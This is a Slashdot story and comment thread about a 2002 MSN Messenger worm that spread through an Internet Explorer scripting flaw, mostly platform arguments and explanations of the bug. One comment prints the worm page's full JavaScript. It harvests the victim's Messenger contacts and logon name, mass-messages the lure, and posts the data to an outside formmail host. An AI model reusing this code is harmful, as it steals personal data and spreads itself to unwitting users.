Microsoft Instant Messenger Virus Sweeps Net

Many people have reported a Warhol virus affecting users of Microsoft Instant Messenger. If you get messaged, "Go To http://www.masenko-media.net/cool.html NoW !!!", or any similar message (apparently there are several websites with the infection code), I suggest not following the link. A brief discussion follows.

Sequence: Get messaged "Go To http://www.masenko-media.net/cool.html NoW !!!" or something similar with another URL. Follow the link. That webpage contains malicious code which gets your messenger contacts and sends a similar message to your contacts. It looks like it uses a vulnerability in formmail.pl as well, although I'm not exactly sure how (I'm not an expert in ECMAscript, sorry, and I have no systems that could possibly be affected by this to test with). I'm sure some of our readers can provide more information in the comments below.

There appear to be several webpages which carried the infected code, not just masenko-media.net. Some webmasters are already taking them down.

Sophistication: moderate. Damage: only your pride.

Solution: probably the latest mega-patch for Internet Explorer will fix the Microsoft bug that allowed this.

Risks: obviously, the code could have done worse than just messaging your contacts. With Microsoft making "messaging" an integrated part of the operating system, any flaws in it can be exploited to affect millions of people instantly, so it is a high-value target. Does it have commensurate high-strength security?

this didn't infect me..

because I was using the linux version of Microsoft Messenger!

Re:this didn't infect me..

[erobertstad]

gAIM works good for MSN and a few other IM's too, tho it lacks the these wonderfull features (see above story).

Re:this didn't infect me..

>with windows you could do it with a couple of clicks.

Unless it screws up, in which case you are screwed.

With linux, I can fix it.

Can you?

No.

Re:this didn't infect me..

Ok, so who here will write the best "your friend should update his insecure windows-system, so that you don't keep on getting this message"-version of this script? ;-)

Re:this didn't infect me..

Ditto - but with a posher GUI (OS X). Another reason to buy a mac. As if you needed one ;)

This is news?

[WheelDweller]

Isn't everything 'integrated' into Win9x prone to viruses? (Man, if we could only get these guys to write kernel code or GUI toolkits...)

Re:This is news?

[Stackis]

Why the fuck does ./ even post this shit, and call it news...

They no damn well it's going to generate nothing but flamebait from the folks posting responses...

I guess I just don't get it...

Re:This is news?

[joshsisk]

Uh, so people can download the patch before they get the virus, maybe?

Re:This is news?

What the fuck is "./" ? Maybe you could grace us with an opinion of some value, or just leave.

Re:This is news?

[duren686]

Bzzt, wrong.

MSN Messenger is a downloadable on every Windows prior to XP, AFAIK (I'm not sure about 2k or ME, but I know that it isn't integrated into anything, even if it comes with the OS)

Re:This is news?

[phr34k]

Most of the flamebait gets moderated down anyway so users can choose to ignore it.

And anyway... Why should /. only be open to Linux users? I'm using Microsoft at work mostly because all the development software we need is released for it. Therefore most of my time is using Microsoft software.

I'm still reading /. because it's informative, up to date and generally /not/ biased towards any OS. There's flames, but you end up with flames no matter where you go...

Re:This is news?

[fader]

it isn't integrated into anything, even if it comes with the OS

Bzzt yourself. Messenger is integrated with at least Outlook, and I suspect IE 6. (IE can make API calls to Messenger, regardless.) And you have apparently never used XP, where it seemingly pervades the entire system. *shudders*

Re:This is news?

[fjordboy]

I won't do the stupid *bzzt* think..but I think you are misinformed. I have both Outlook 6 (freaking slow piece of carp) and IE 6, and I have NO MSN messanger or Microsoft Messanger or anything. I've never really used it. *shrug* I'm running Windows 98...so that might have to do with why it isn't integrated.

Re:This is news?

[Mark+Pitman]

Any application can "make API calls to" (I think the better term is "automate") Messenger. I have written VB apps to do it. It is similar to the way you can fire up an instance of Word or Excel from a VB app and create a document programmatically. Nothing really to do with whether it is integrated into the OS or any other application.

Re:This is news?

[fjordboy]

erm..."thing" not "think" stupid typo.

Re:This is news?

[fader]

*shrugs* All I know is that I'm forced to use Outlook at work, on a 2000 box. Outlook shows whether or not the sender for any emails you're viewing are online or offline if they're in your MSN contact list.

Re:This is news?

[vanillicat]

Slashdot most certainly does have a bias. Editorial comments appear on the front page. When was the last time you saw Slashdot advocate something like windows XP? When was the last time you saw Slashdot advocate something linux based?

Exactly.

Re:This is news?

I believe he was referring to current directory...

Re:This is news?

[fred911]

Time to get a new admin. 90% of all user infections are caused by Outhouse. Install another email client.

Darn, too late

[Guspaz]

Just submitted a lengthy story about this. Oh well. On another note, have you signed the futurama petition? Fox is canceling it. http://www.petitiononline.com/futufu/petition.html PS: First comment? By me? Wow!

The solution...

Is the solution simply to not use Microsoft Messenger?

Re:The solution...

[iamplasma]

Yes, but guess what M$ have decided to make a compulsory add-on to windows XP. Yep, that's right, Messenger. I can just wait for the argument as to why "messenger is an essential part of windows".

Re:The solution...

[(startx)]

it can be removed from xp. Read ntcompatible.com, then go change your registry and remove messanger! Oh, wait, I mean laff at your friends who use windows, right.........

Re:The solution...

[DeathPenguin]

>>Is the solution simply to not use Microsoft Messenger?

No, but that's a good start.

Re:The solution...

[MoneyT]

Why would you have to edit the registry just to remove a friken messageing program. Talk about a pain in the arse. Definately makes me glad I use OS X as my primary OS, Linux as my secondary and Windows as my gaming platform (at least till I get my PS 2)

Re:The solution...

[iamplasma]

That's right. I'm sad to see that you had such a low esteem of me you thought I might be running XP. :)

Re:The solution...

[sketerpot]

And Windows users laugh at how hard it is to install things on Linux. Ha!

To uninstall something properly, all you should have to use is a single RPM (or whatever you use) command. Typically that's all it takes. But with this crazy windows program you have to use an application that MS warns you never to use except in dire circumstances and use some poorly documented trick. Sheesh...

.NET?

Someone probably used .NET for this -

Well, that's one less effectual site for vectoring

[Second_Derivative]

If the entire population of slashdot accessing that site to point and laugh at the exploit code and how it doesnt affect them doesnt constitute a slashdotting, I dunno what does =) I already cant access it.

Someone post more links to the other vector pages, if we can't get them down any other way we'll bum-rush em ;)

in the eye of the beholder

[rakerman]

With a name like Warhol, obviously this isn't a virus, it's a form of art.

Re:in the eye of the beholder

Uh... no.

A Warhol virus is one that can infect the entire Internet in 15 minutes (of fame, get it?)

Re:in the eye of the beholder

A really gay form of art...

Re:in the eye of the beholder

hahahhhahahahhaha

Re:in the eye of the beholder

I would like to take this opportunity to formally thank the AC who took the time to enjoy my AC posting.
Please sign my petition at
http://www.angelfire.com/zine2/me1
to be the next governor of cheeze

Forwards are evil / Virus news

[Covant]

I was waiting for one of those super annoying forwarded URL's to cause trouble, and its finally happened.

Why can't one single week go by without a big annoying MSFT bug / virus being exposed?

Do people save these bugs up and release havoc at regural intervals?

Are there people in the inside, planting seeds?

At least it makes for good news.

Re:Forwards are evil / Virus news

[djsable]

>> Why can't one single week go by without a big annoying MSFT bug / virus being exposed?

The media loves that crap. They descend on it like a shark smelling blood. Any other product could have worse bugs, and they would be all Ho Hum, but a MS bug/virus? whooo boy, feeding frenzy!!

Also, because the people who write the Virii target MS (it might just be easier too.) because of the LARGE install base of it. You can write a Linux virus, and it nails like 100 people, but you could write the same bug targeting MS products, and you can nail 100,000! You do the math. :) which is more tempting a target.

No system is 100% secure. Period, end of story.

MS products in general, are like swiss fricking cheese though. My big complaint is the "Turn It on By default" attitude of MS Products. I had the Messenger on my system, and after adding a couple of co-workers, never used it. I got nailed by the bug today, and was quite annoyed by it. Fortunatly, the payload is non destructive, or I would have been PISSED. Leave it off by default, and IF i want it, I'll turn it on.

badger

Re:Forwards are evil / Virus news

[Reikk]

A week doesn't go by where there isn't a security hole in redhat or debian. The difference is slashdot has a vested interest in protecting the repuation of linux.

Debian security holes so far this month:
DSA-110: CUPS - buffer overflow (today)
DSA-109: faqomatic - cross-site scripting vulnerability (today)
DSA-108: wmtv - symlink vulnerability (Feb. 7th)

Redhat security holes this month:
ucd-snmp: Remote exploit, DOS (Feb. 12th)
kernel: crash the kernel with a malformed packet (Feb. 5th)
uucp: ability to change UIDs (Feb. 4th)


Slashdot's FUD and bias is mildly amusing at times, but I hope nobody really takes this site seriously anymore.

Re:Forwards are evil / Virus news

[MoneyT]

I would think (barring the massive ammounts of security one would have to bypass) that if one wanted to kill a large number of computers with a virus, a *NIX virus would be the way to go.

Re:Forwards are evil / Virus news

Because Micro$oft hasn't yet been nuked.

Go to UA and book a flight to Redmond, Micro$oft Oneway

That should solve the problem >:->

Re:Forwards are evil / Virus news

ROTFLBTC

compare the impact of these security holes with the impact of an average M$ virus.

I know of several companies that have lost a fair amount of money because of dramatically increased phone bills when each Code Red atatck would open their internet connection.

The Debian/Redhat vulnerabilities affect your own systems and you can do something about them. What can you do about a M$ virus? Sue M$? (I hope someone did)

So in fact FUD and bias is on your side.

Re:Forwards are evil / Virus news

> No system is 100% secure.

But only one is 99% insecure.

ToO mAnY cApS!!!11

iF yOuR fRiEnDs SeNd YoU mEsSaGeS fOrMaTtEd LiKe ThIs, YoU nEeD tO fInD nEw FrIeNdS!!!11

Re:ToO mAnY cApS!!!11

asl ?

Other clients?

[Geeyzus]

I assume this only affects the MSN client from Microsoft... correct? Or does this also affect other clients that can use the MSN network, like Trillian? If it is just a link to some virus code on a website, it would affect Trillian (because it actually doesn't propagate through the instant messaging program)... but if it is something that gets triggered inside MSN Instant Messenger, then Trillian users are safe...

Mark

Re:Other clients?

[Static_Neurotoxin]

Trillian is safe. Opera is safe. The only combo you need to worry about is IE and Messenger.

Re:Other clients?

[Qwerpafw]

Fire (like trillian, but for OS X) doesn't seem to care. At least, as far as I can tell. Most likely the security hole lies in windows/MSN integration. or in the MSN client software. But not the messaging protocol.

Of course, the trillian people have a MUCH better track record in terms of patches and so forth (they keep updating so it'll work with AOL...) so even if it affects trillian (pretty sure the answer is NO...) they will fix it before M$.

Re:Other clients?

Actually, Trillian will work without a web browser, (98lite) while MSN messenger requires IE 4...
So visiting a malcious web-page shouldn't affect it, as it's not really "integrated" like IE/MSN-messenger.

Re:Other clients?

[jaavaaguru]

EveryBuddy and Gaim are two alternative messaging clients that have access to the MSN chat system. I use to use Everybuddy but I prefer Gaim's interface now. Both are fully "skinnable" (using GTK themes) link Trillian is. There are plenty of alternatives to Microsoft's offering. MS's software would appear to make extensive use of scripting like most of their other products do, which does more bad than good with worms/viruses such as this one on the rounds. Gaim support perl scripting, but it's easy to disable it, and it's default state is disabled. I understand that most internet chat users probably don't realise that their software has this scripting ability. Maybe something needs done to make them aware of it and what it can (potentially) do. Then we might see less stories about people falling victim to these attacks. (hey!, stop laughing and saying they deserve it! that's not fair...)

Re:Other clients?

[ahde]

It affects trillian too -- but only your MSN contacts. And you have to use IE when you click on the link.

Re:Other clients?

I got hit by this, and was using trillian at the time, however, what happened, even though I had MSN closed down, it launched the MSN client, then propergated itself. Harmless, annoying yes.

Re:Other clients?

[Psx29]

The more M$ products you use the worse off you are basically ;P

Re:Other clients?

Hah! I'm glad that I've recently switched to both Trillian and Opera.

Re:Other clients?

[matrix29]

The more Microsoft products you use the worse off you are basically.

This is timeless wisdom perfect for a line of T-Shirts.

Anyone surprised?

[Qwerpafw]

I for one, am not shocked at all :)

Anyone who is shocked is a bit of a fool. It was only a matter of time, really, until one of M$'s many security holes in messenger was exploited. Kinda sad to think what will happen in the future as OS becomes more and more integrated with the internet. Your personal data (courtesy of passport) might be spread around if you replied to a IM, or data loss.

Don't use microsoft products, so I am not vulnerable. Happy me.

Re:Anyone surprised?

There is no hole in MSN mesenger. It's a hole in IE that was patched weeks ago. Learn to read, it'll take you far.

Looks like they want in on the aim monopoly

First they want interoperablilty. Now aim has security exploits, so they have to have them too. Damn microsoft is childish.

what's the url?

[MathJMendl]

What's the url for this virus? The link to "Go To http://www.masenko-media.net/cool.html NoW" wasn't clickable. Please fix this, /. admin!

Re:what's the url?

[Schmerd]

Are you serious? A URL is an address, not necessarily something you can click on. /. left off the HREF on purpose so that people wouldn't blindly click and get burned by the malicious code.

Re:what's the url?

Are you serious?

Never. :-)

Re:what's the url?

im gonna guess that it was a joke. calm yourself.

Re:what's the url?

[Covant]

I think your sarcasm font is broken...

That reminds me, I wish MSN had tone markup's..
they've got enough of those dumb smiley faces.

Re:what's the url?

[iamplasma]

I wouldn't put it past some people.

Re:what's the url?

[MathJMendl]

Seeing as to how three separate people didn't see my invisable sarcasm tags, of course I'm not serious, lol. Thought it was obviously a joke. :-)

Re:what's the url?

[jimlintott]

Don't worry. It was obvious.

The Code

[nihilist_1137]

Use Trillian :http://www.trillian.cc. A few people msg me with the link. All that happens in that a blank window pops up. Mind you, i am on dual monitors so that may have had something to do with it. The code for the page (http://www.masenko-media.net/cool.html ) is:
<br><br>
<html>
<head>
<title>Welcome</title>
<Script>

var msnWin;
var msnList;
var msgStr = "Go To http://www.masenko-media.net/cool.html NoW !!!";

function Go(){

msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F79568 3" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C54 1" id="msnObj2"></object>';
focus();

if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}

function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "<br>";

for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}

else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
}
document.contents.contentBox.value = msnStr;
}

function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}

</Script>
</head>
<body onload="Go()">
<p align="center">&nbsp;
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center"><font face="Arial">
Please Wait...</font></p>
<form METHOD="POST" ACTION="http://www.yong.f2s.com/mailform.pl" NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="http://www.rjdesigns.co.uk/cool/go.htm" ID="Hidden1">
<input type="hidden" name="recipient" value="mmargae@wanadoo.nl" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>
</body>
</html>

Re:The Code

[suwain_2]

$ wget http://www.masenko-media.net/cool.html
--19:08:55-- http://www.masenko-media.net/cool.html => `cool.html' Connecting to www.masenko-media.net:80... connected! HTTP request sent, awaiting response... 404 Not Found 19:08:55 ERROR 404: Not Found.

Seems they took it down? Now is this just going to have millions of people getting 404 messages?

Re:The Code

[einhverfr]

So this sends the links to your contacts in IM and takes your passport email address and sends it to the http://www.yong.f2s.com/mailform.pl (or something similar).

Damage: not just your pride-- being bombarded with lots of spam? (I guess that is TBD)

Re:The Code

[Intel86]

It does not send your Passport address, but it does send somebody's (possibly the referrer?). My code is slightly different, but it's not my e-mail address that gets sent.

Re:The Code

[meanman]

> msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
> msnWin.resizeTo(1, 1);
> msnWin.moveTo(10000, 10000);
> msnWin.document.title = "Please Wait...";

This is a particularly annoying tactic that some popup ads use, where you create a new full screen window (only works in IE) then resize it and move it. The result is a window that has no border at all, and the malicious ad can then display a 'windows like' dialog image that can easily fool your average windows user into clicking.

Re:The Code

[einhverfr]

re-read the code-- the email address in the code is not yours. However, the jscript takes your msn logon (i.e. email address) and adds that to the form before submitting it!

Re:The Code

[c0wh]

To nitpick a bit, this tactic is actually used to hide the window in all respects but its entry in the taskbar. (it's resized to one pixel tall and wide, and moved way off the lower right corner, unless your screen resolution is above 10,000 x 10,000.)

Popups like this usually avoid being noticed, so they can launch normal pop up ads at thirty second intervals if they so choose.

I can't stand this crap. Mozilla has gone in a great direction by disabling any "window.open" calls except from user generated events. (no more popups "onLoad" or "onUnload," if you enable that feature)

Re:The Code

[inKubus]

It's funny. Most of the code for Windows looks like this. Windows is basically one big script. Everything it does, practically, is scripted. They were relying on the fact that most of the scripting is undocumented, but a simple browse to \windows\web and opening *.htt with notepad should show you how much of a problem this is. Even something as fundamental as file browsing is scripted. There will always be a way to exploit windows.

Re:The Code

[Graspee_Leemoor]

"Windows is basically one big script. Everything it does, practically, is scripted....There will always be a way to exploit windows"

As opposed to linux where there is not a script in sight?

Actually the Windows scripts differ from linux ones in that they control some pretty fundamental things in the OS, like the html behind file-manager windows. Linux scripts are, I suppose, only run at certain specific times, like ppp-up or system shutdown.

Of course, either system is open to the abuse of replacing standard scripts with malicious ones, it's just that under linux most people are not using their root account for day-to-day work, while under Windows nearly everyone's Administrator.

blah blah, this is because a) Users know no better , b) Because Windows has this different mindset there are a whole bunch of things you have to be Administrator to do, so it is harder for security-conscious users to seperate the user from the super-user.

graspee

Does this effect Trillian?

I use Trillian to connect to MS-IM. Can I be infected?
I also use Opera and I'm not daft enough to run downloaded software until I double check with the sender. I assume I'm safe, but I would like to know (so I can act all smug about using Trillian and Opera ;))

Well, they'

[z00r]

Contrary to the Orwellian theme, it's clear that in the computer world, ignorance (which causes people to use Windows software) is a major liability.

could be a lot worse, likely will be soon

[immanis]

I wrote a simple script about a year ago that exported a user's MSN registry key and sent it to me. Given that MSN logins, Passport Logins and Hotmail logins all could be gleaned from that key... well you get the idea.

It worked too. Got to log into MSN as the CTO of our company, just to make a point.

As long as scripters can manage things like this, and as long as it is _that_ easy to pull a person's login data from the registry, Passport will _never_ be secure.

Re:could be a lot worse, likely will be soon

[PaperTie]

Wouldn't that only work if you choose to store your login info for next time? If that's the case, then it's the more the fault of lazy users than Microsoft.

Re:could be a lot worse, likely will be soon

[Ooblek]

Yeah, its too bad someone made such a thing as scripting languages. They are all ultra evil agents of Microsoft. Which scripting language do we abolish first? Perl? [c|ba|k]sh? ECMA? VBScript?

Maybe if scripting languages are abolished, all the laid off techies that actually have real skills will have an easier time finding work.

Do scripting languages prove or disprove the statement, "People are basically good?"

Re:could be a lot worse, likely will be soon

Ignoring your troll, I'll take a minute to respond to your comment:

It's not the scripting languages themselves that are insecure: it's the lack of security browser-side. Internet Explorer does basically NO checking of the script, so if the scripting language has the ability to do something (like read/write the registry), then IE will allow it.
It's a design flaw from MS, not the language designers.

For all we know, Konqueror/Galleon/whatever have the same problems. Possible? Yes. Critical? Not really, since you'd need root access to read/write vital files.

Re:could be a lot worse, likely will be soon

[Tony-A]

Or if Microsoft decides to store it anyway.
If it's stored as a temporary prior to making it permanent.
What little security there is is more the fault of lazy crackers.

FUD. Fear Uncertainty Doubt. Where does your data want to go today?

Not a Messenger flaw

[Osty]

First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions. As the post noted, it is fixed with the latest IE patch. The actual problem was with IE's document.open scripting object, and how it was able to access local system objects from web sites (basically, the about: URI namespace was considered to be in the "My Computer" security domain, which means it had much more lax security than an actual website. However, since about: can take valid html, site developers were able to embed Messenger objects in about: pages, and access information from that). This is not a problem with Messenger at all.

Install the patch and be done with it.

Re:Not a Messenger flaw

[RWarrior(fobw)]

"Install the patch and be done with it."

Is that why I keep getting probed with NIMDA? Because people just install the patch and are done with it?

Re:Not a Messenger flaw

[Tackhead]

> First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions.

And while we're at it, this isn't a Warhol worm either.

I don't see the optimized scanning routine for initial propagation. I don't see a precompiled target list or any innovative ways to scan the network. And if you wanted to do maximum damage, you'd release it on a Friday night before this weekend.

Unless the spam from the formmail.pl script contains a very clever exploit to set the stage for a second round of infection, I'm calling this one a false alarm. It's an annoyance, but not a Warhol worm by any stretch of the imagination.

Re:Not a Messenger flaw

And what about all the idiots that install Linux and leave every server on in it's unpatched state and then instantly become DDoS client machines when they hook up to the net? Is that Linux's fault? Noone on here would think so, but the same exact scenario IS Microsoft's fault? Well either it is or it's not, but Linux has the same damn problem!

Re:Not a Messenger flaw

[rhavyn]

Hmm ... or maybe it's because that problem with Linux went away a long time ago. A default workstation install of Red Hat Linux 7.2 has zero open ports and a firewall that blocks access to all ports under 1024.

Now, obviously if someone sets up a server and doesn't patch, that person is an idiot (and that is true no matter what OS he/she is running). Unfortunately for your argument, we're talking about an instant messenger client and a web browser, not things that are likely to be installed on a server. The fact is, you can't exploit my Linux system via Mozilla/Konq/Galeon/Netscape, yet every other week, a new way to exploit Windows using IE pops up.

So, in conclusion, your argument is completely irrelevant to the topic at hand ... there has never been an exploit like this released against Linux, there is an exploit like this released against Windows about once a month ... I think we can safely start saying it's Microsoft's fault at some point.

Re:Not a Messenger flaw

[lessthan0]

And next week, when the next batch of critical security flaws is revealed, follow the Microsoft DIR cycle...

1. Download the patch.
2. Install the patch.
3. Reboot.

Plan to do this every week on all your critical servers, work machines and home PCs. Just do this every week forever, or as long as you run a Microsoft OS and be done with it.

Re:Not a Messenger flaw

[essdodson]

And in Linux news today, a patchset is now available to fix file system corruption introduced into the last patch... In other news lICQ has a known DoS, xchat's exploit has now been patched as well... Please download, build and reinstall, be sure to smile and act like your OS has no flaws while you're doing so.

Same thing, different OS, no better, perhaps even worse... MS now even pushes patches to you. Just wait until braindead users find Linux.

Re:Not a Messenger flaw

[CaptainSuperBoy]

A default install of Windows XP has zero open ports and a firewall, too. It automatically downloads security updates, which should prevent this IE exploit from becoming widespread.

Maybe the problems you're talking about went away in Windows? For someone who is so up to date on Linux, you should learn a little about Windows before you bash it for past problems.

Re:Not a Messenger flaw

[hyyx]

Plan to do this every week on all your critical servers...

Who is running Messenger on their critical servers?

Re:Not a Messenger flaw

[Osty]

Hmm ... or maybe it's because that problem with Linux went away a long time ago. A default workstation install of Red Hat Linux 7.2 has zero open ports and a firewall that blocks access to all ports under 1024.

Except that Red Hat Linux 7.2 is not exactly all that old. Even as recently as RedHat 7.0, there were still security problems with a default install. That's what, a year old? And RedHat is not the only distro out there. And not everybody installing today is installing the latest versions. I spoke with a guy just recently who wanted to install SuSE 6.0 (SuSE is at version 7.3, now. 6.0 is roughly 2-2.5 years old, or so), simply because those were the CDs he had on-hand. I constantly see people trying to install RedHat 6.2, and even 5.2. As well, your argument is ignoring all those people that installed Linux back during the whole dot-bomb bubble (because Linux was the up-and-coming cool thing to have), and promptly forgot about that system in their back room running it. That's what, RedHat 6.0? SuSE 6.0? Slackware 4.0? Those installations are still a problem even today.

Now, obviously if someone sets up a server and doesn't patch, that person is an idiot (and that is true no matter what OS he/she is running). Unfortunately for your argument, we're talking about an instant messenger client and a web browser, not things that are likely to be installed on a server. The fact is, you can't exploit my Linux system via Mozilla/Konq/Galeon/Netscape, yet every other week, a new way to exploit Windows using IE pops up.

Right. Anyone setting up a server and not patching is an idiot. But that doesn't mean people aren't doing just that. Both Microsoft and RedHat have taken steps to protect against that, yet Microsoft is villified while RedHat is heralded. That was exactly the point of the AC's comment. Yes, this article was about an IE exploit. Yes, his comment was off-topic. No, his comment is not ungrounded. Within the scope of his comment pertaining to servers, you know what he said is true. You might not want to believe it, but it is. Anyway, the reason why you don't see many exploits for Mozilla/Konq/Galeon/Netscape (three of which are all based on a single rendering engine, and the fourth can use that same engine as well) is because they are small potatoes compared to IE. There's just not much reason for hax0rs to spend their time finding exploits in those browsers when they're only going to hit maybe 5% of the browsing public (and I'm being generous). Microsoft software really doesn't have significantly more problems than any other software. Microsoft is simply a large target, and so many and more people spend much more time finding those holes (often for malicious purposes, sadly).

Re:Not a Messenger flaw

Then why doesn't it work in Trillian?
It's not broken, it's a feature ;)

Re:Not a Messenger flaw

[Osty]

Because Trillian is not Messenger. The way this works is IE embeds a Messenger COM object. Since Trillian, if it even defines a COM object that could be embedded by IE, is not Messenger, the GUID that defines the object will be different. Since the object is embedded by GUID, of course Trillian isn't going to work. However, if Trillian exposed the same or similar functionality in a COM object (not likely), and the so-called "virus" was targetted towards Trillian users (also not likely; too small of a target), then Trillian would be "affected".

Re:Not a Messenger flaw

[rhavyn]

Where exactly in my post did I bash Windows? I pointed out that I agree that server admins that don't patch systems are at fault if their server has problems. But, I also pointed out that we're not talking about servers being exploited, we're talking about software which runs on top of Windows consistently have gaping holes.

Microsoft could put as many firewalls as they want to into their product, but IE (or out look, or uPNP, name your exploit of the week) continually has holes in it. A web browser should not have the capability to cause the havoc that IE has caused for Microsoft users (and don't even get me started on Outlook).

Not that there isn't plenty of reasons to bash Windows, please don't imply that I'm doing something that I'm obviously not doing (and don't automatically assume that I know nothing about Windows just because I know something of Linux).

Re:Not a Messenger flaw

Plan to do this every week on all your critical servers, work machines and home PCs. Just do this every week forever, or as long as you run a Microsoft OS and be done with it.

Or, you could switch to linux. Because linux never has any bugs. Never. Nuh-uh.

Re:Not a Messenger flaw

[rhavyn]

You were doing good up to here:

Microsoft software really doesn't have significantly more problems than any other software. Microsoft is simply a large target, and so many and more people spend much more time finding those holes (often for malicious purposes, sadly).

IE has the biggest marketshare, and Windows has the biggest desktop marketshare, but the reason that people attack Windows systems is it's easy. I wish people would stop kidding themselves with the market share excuse. MS software has serious design flaws which makes it very easy to exploit a flaw in the browser to extract data from the registry and mail that off to some email address. Under windows, that is easy, under Linux there are multiple different browsers, you don't know what email client might be available, there is no central place to grab system/user info and there is no easy way to automate the process. The same type of exploit is used over and over and over again, yet for every patch MS releases, someone finds a new way to write an exploit that uses the same basic method. How long, exactly, do you think it's going to take before Microsoft recognizes this and fixes the design flaws instead of releasing patches which amount to little more then sticking their finger in the crack in the dam?

Re:Not a Messenger flaw

[vinnythenose]

Actually (this might have been stated earlier, so forgive me). You can't place all the blame on Microsoft, but a good portion of it. The holes are still there in Linux, they get exploited all the time. When you exploit a hole in MS products, it becomes a huge problem because a lot more people use them. Whereas if you exploit a linux hole, then a smaller amount of people are affected, and the vast majority tend to have more computer knowledge so they can fix and patch it up quickly.

It's just statistics, it's a proven fact that any complex software will have bugs and exploits, it's just how many people use it. Plus the more people using MS products means more malicious people using it (why target the minority if you want to be a pain in the ass).

But yes, Microsoft really does need to think a few things out better when they're making their code. But I don't hole them 100% responsible for the exploits (although their responses to the exploits could be better).

Re:Not a Messenger flaw

Did you notice, out of curiousity, that at the same time as the last big huzzah about IE having a major vulnerability, Netscape released a new .01 release of both 4.7x and 6.2x fixing the same problem? Other software is no less succeptable to these things than Microsoft's, the difference really is that a Mac vulnerability would be nowhere near so exploitable as a Windows one, thus practically nobody even looks. (Nobody who isn't a lot more subtle than these folks, anyhow.)

Re:Not a Messenger flaw

[Malcontent]

"Install the patch and be done with it."

On all 5000 desktops of your corporation.

Re:Not a Messenger flaw

This is a problem with messenger - the fact that it allows a (admittedly "trusted") web page to access it's contacts list and also send messages/files etc to them. If access to this object model was blocked the same way access to the Outlook XP model was (it pops up a window asking you if you want to allow another program to send mail) then this would never have happened.

Re:Not a Messenger flaw

"First off, this is not a virus."

damn right boy its a feature!!!

pkm

Re:Not a Messenger flaw

[mystran]

the question here is that setting up a TCP port for incoming connections should be so hard that only a hardcore wizard (guru's not good enough) can do it...

from them we MIGHT be able to expect even SOME sort of idea about what patching and updating is all about.. then again.. MS has teached people that patching means new features so many will just think "it works fine, why patch ?"

Also it has became common that there are no patches to old versions.. you can't have the security without new features.. and some of those features might break you config.. this is not the case just with MS but also with Open Source and Free Software (as in speech)

Re:Not a Messenger flaw

[ConsumedByTV]

Pig headed idiot.

A couple of things:

• You have to turn on the auto update feature, its not on by default.
  
• The Universal Plug and Play (UPnP) subsystem vulnerabilities in XP

As someone thats "so up to date on windows", you should learn a little about it before you start to talk about it.

Everything has problems microsoft just puts the problems into the hands of people that cannot fix it, the end user.

Re:Not a Messenger flaw

It's true that these are fundmental design flaws in Microsoft products but don't expect to see that change anytime soon. The main reason that MS products are easier to exploit is that they do everything in their power to make it easy for the end user. They're willing to plug the holes as they come up for the sake of ease of use. If you create a Linux distro that even my grandmother could install and use I'd be willing to bet it would have just as many holes.

And before anyone starts thinking I'm a MS fan, as soon as they port Dark Ages of Camelot and a couple of other games to linux I'm burning windows CD's :)

Re:Not a Messenger flaw

[jesser]

under Linux there are multiple different browsers, you don't know what email client might be available, there is no central place to grab system/user info and there is no easy way to automate the process

Security through obscurity? No thanks. That only makes it harder to write a payload for a worm or virus; it doesn't make propogation much harder.

Re:Not a Messenger flaw

[maxpublic]

It has nothing to do with obscurity. Unless you can grab root access you can't do anything at all interesting. A fundamental difference in architecture.

Your only hope with Linux is that the operator is an idiot. In Windows the operator is likely to be an idiot, but if not the OS will happily make him look like one.

Max

Re:Not a Messenger flaw

[CaptainSuperBoy]

Auto-update is on by default in Windows XP, it is set to prompt you before downloading and prompt you again before installing the patch. Or would you rather have it install random software without asking you?

The UPNP flaw is fixed by XP's auto-update.

And, pig headed idiot? Come on, you're not even trying there.

Re:Not a Messenger flaw

[CaptainSuperBoy]

Where exactly in my post did I bash Windows?

Right here:

every other week, a new way to exploit Windows using IE pops up

My point was, you were comparing this year's Linux to last year's Windows. WinXP, with security updates, is reasonably secure. Even Redhat 7.2 has over 30 security updates.

interesting article on the reg

[rogueuk]

the register had an article about this a few days ago. A flawed Document.Open() in the script apparently causes it. The demo site the reg links to is pretty interesting. And of course, MS has known about this since december :-P

Re:interesting article on the reg

[Covant]

Of course. They probably know about all the security flaws before they happen, they just don't bother to fix them.

It's like in Fight Club, the formula, if a (the cost of paying 10 programmers $100k/Annum each) * b (the time it would take to fix) * c (the percent of people that wouldn't buy/use IE / Windows regardless of the plethora of flaws) is greater than some innane constant, they don't fix it.

until it blows up.

Re:interesting article on the reg

[calags]

You know a really virulent virus is coming when Microsoft insiders sudden sell as much MS stock as they can. Just like the Enron higher ups they'll cut and run.

This brings up a question: If a real devastating security flaw is reported to them; they keep mum about it and then a massive security breach occurs that wipes out most MS OS machines out there (you know it's bound to happen :) does that mean that the SEC can move on them due to insider information?

Re:interesting article on the reg

[Osty]

It's like in Fight Club, the formula, if a (the cost of paying 10 programmers $100k/Annum each) * b (the time it would take to fix) * c (the percent of people that wouldn't buy/use IE / Windows regardless of the plethora of flaws) is greater than some innane constant, they don't fix it.

